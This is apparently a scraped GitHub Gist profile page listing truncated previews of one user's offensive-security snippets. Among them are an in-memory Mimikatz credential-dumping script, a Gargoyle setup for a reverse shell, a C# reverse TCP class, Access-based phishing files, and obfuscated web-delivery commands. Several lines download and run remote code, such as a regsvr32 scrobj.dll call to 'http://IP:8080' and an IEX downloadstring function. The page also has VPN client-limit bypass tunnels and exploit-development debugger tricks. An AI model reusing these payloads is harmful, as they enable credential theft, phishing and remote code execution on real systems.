Skip to content

Instantly share code, notes, and snippets.

aDoN adon90

  • Spain
Block or report user

Report or block adon90

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
adon90 / setup.nasm
Last active May 18, 2018
Gargoyle setup.nasm to execute a reverse shell instead of messagebox
View setup.nasm
STRUC Configuration
.initialized: RESD 1
.setup_addr: RESD 1
.setup_length: RESD 1
.VirtualProtectEx: RESD 1
.WaitForSingleObjectEx: RESD 1
.CreateWaitableTimer: RESD 1
.SetWaitableTimer: RESD 1
adon90 / mimikatz.ps1
Last active May 29, 2018
PowerShell Shellcode Injection fix on Win 10 (v1803)
View mimikatz.ps1
function Invoke-Mimikatz
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
adon90 / Database3.accde
Last active Jul 4, 2018
Phishing Access Macroless .MAM Extension
View Database3.accde
------Database Shortcut--------
[Shortcut Properties]
CreationTime= 1d4138fe237a9fc
View phishing.txt
1. Macro Web_Delivery + Invoke-Obfuscation
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
adon90 / bypassvpn.txt
Last active Jul 10, 2018
Bypass VPN Number of Clients
View bypassvpn.txt
openvpn adon901.ovpn
sshuttle -vr root@HOST
sshuttle -vr root@HOST
socat TCP4-LISTEN:8443,fork,reuseaddr TCP4:<COMPUTER1>:80
View runas-cabesha-webdelivery
function runas-cabesha-webdelivery {param ($url,$user,$pass)
$username = $user
$password = $pass
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credenciales = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Job -ArgumentList $url,$credenciales -ScriptBlock {param ($url,$credenciales)
$O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($O.downloadstring("$URL"))
} -Credential $credenciales | Wait-Job | Receive-Job
adon90 / exploiting.txt
Last active Aug 1, 2018
Exploiting Tricks
View exploiting.txt
Mona tricks:
!mona pc 1000 -> Launch exploit with pattern
!mona findmsp -> autocalculate offset, ESP size.....
No jmp esp in Exec Region (.text) but no DEP:
!mona asm -s "jmp esp"
!mona find -s "\xff\xe4" -m <module>
View powershell_api.txt
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class GetAddress
[DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
View ReverseC#TCP
Add-Type -TypeDefinition @"
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Net.Sockets;
public class ReverseTCP
View Frida
import sys
import pefile
import frida
def on_message(message, data):
print "[%s] -> %s" % (message, data)
You can’t perform that action at this time.